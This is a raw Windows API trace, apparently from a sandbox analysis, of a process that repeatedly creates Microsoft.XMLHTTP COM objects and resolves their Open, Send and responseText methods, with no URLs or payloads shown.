	[0427.753] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0427.753] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.753] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0427.754] ??2@YAPEAX_K@Z () returned 0x62f330
	[0427.754] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0427.754] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.754] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0427.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0427.754] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0427.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.754] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.757] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.757] SysStringLen (param_1=0x0) returned 0x0
	[0427.757] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0427.757] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0427.757] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0427.757] ??2@YAPEAX_K@Z () returned 0x62f310
	[0427.757] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0427.757] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.757] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0427.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0427.757] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0427.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.758] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.758] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.758] SysStringLen (param_1=0x0) returned 0x0
	[0427.758] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0427.758] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0427.758] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0427.758] ??2@YAPEAX_K@Z () returned 0x62f330
	[0427.758] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0427.758] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.758] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0427.758] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0427.758] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.759] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.759] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.759] SysStringLen (param_1=0x0) returned 0x0
	[0427.759] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0427.759] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0427.759] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0427.759] ??2@YAPEAX_K@Z () returned 0x62f310
	[0427.759] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.759] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0427.759] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0427.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.760] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.760] longjmp () 
	[0427.760] longjmp () 
	[0427.760] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.760] SysStringLen (param_1=0x0) returned 0x0
	[0427.760] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0427.760] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0427.760] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0427.760] ??2@YAPEAX_K@Z () returned 0x62f330
	[0427.760] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0427.760] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.760] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0427.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0427.761] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0427.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.761] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.761] longjmp () 
	[0427.761] longjmp () 
	[0427.761] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0427.761] SysStringLen (param_1=0x0) returned 0x0
	[0427.761] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0427.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0427.761] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0427.761] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0427.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0427.761] ??2@YAPEAX_K@Z () returned 0x62f310
	[0427.761] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0427.762] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0427.762] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.762] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0427.762] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0427.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0428.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0428.693] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0428.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0428.693] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
